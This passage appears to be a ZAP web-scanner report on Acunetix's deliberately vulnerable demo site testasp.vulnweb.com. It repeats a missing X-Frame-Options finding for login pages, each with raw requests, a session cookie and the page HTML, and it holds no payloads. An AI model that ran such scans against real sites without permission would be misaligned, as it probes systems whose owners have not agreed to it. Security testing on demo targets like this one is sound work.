| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" 